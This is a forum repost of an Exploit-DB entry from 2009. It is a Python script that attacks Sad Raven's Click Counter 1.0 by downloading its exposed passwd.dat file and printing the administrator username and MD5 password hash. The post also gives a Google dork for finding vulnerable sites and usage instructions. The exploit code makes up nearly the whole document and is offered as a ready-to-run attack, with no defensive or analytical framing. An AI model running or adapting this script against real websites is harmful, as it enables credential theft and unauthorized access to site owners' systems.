Exploit Sad Raven's Click Counter 1.0 - 'passwd.dat' File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7844
Проверка EDB
  1. Пройдено
Автор
POUYA_SERVER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-01-21
Код:
#!/usr/bin/python
#Portal Name: Sad Raven's Click Counter
#version : 1.0
#'Google Dork : Sad Raven's Click Counter v1.0
#Exploit Coded by: Pouya_Server
#Exploit Discovered by: Pouya_Server
#Contact Me : [email protected]
 
import urllib
import sys
import parser
serv="http://"
i=0
for arg in sys.argv:
     i=i+1
if i!=3:
 print """\n\n
         \tSad Raven's Click Counter v1.0  (passwd.dat)                          
          \tUsage:exploit.py [targetsite] [path]
          \tExample:exploit.py www.target.com /Path/
\tResult=$Password['Admin']="c71032e32b9ce349f99f655e68d7324g"
     \t       $Password['Admin Username']="Admin Password [MD5]" \n\n"""
else:
   
    adres=sys.argv[1]
    path=sys.argv[2]
    str1=adres.join([serv,path])
    str2=str1.join(['','/passwd.dat'])
    print "\n[~]Connecting..."
    url=urllib.urlopen(str2).read();
    print "\n[+]Connected!"
 
    test=url.find(path);
    t=0;
    print "\n\t\t\t-=[Admin Username and Password]=-"
    while(url[test+1]!=1): # Pouya
              print url[test],
              if(url[test]=='\n'):
                 t=t+1; 
              if(t==2):
                 break;
               
              test=test+1;
    print "\n\n\t\t\t[ coded by Pouya_Server ]"

# milw0rm.com [2009-01-21]
 
Источник
www.exploit-db.com

Похожие темы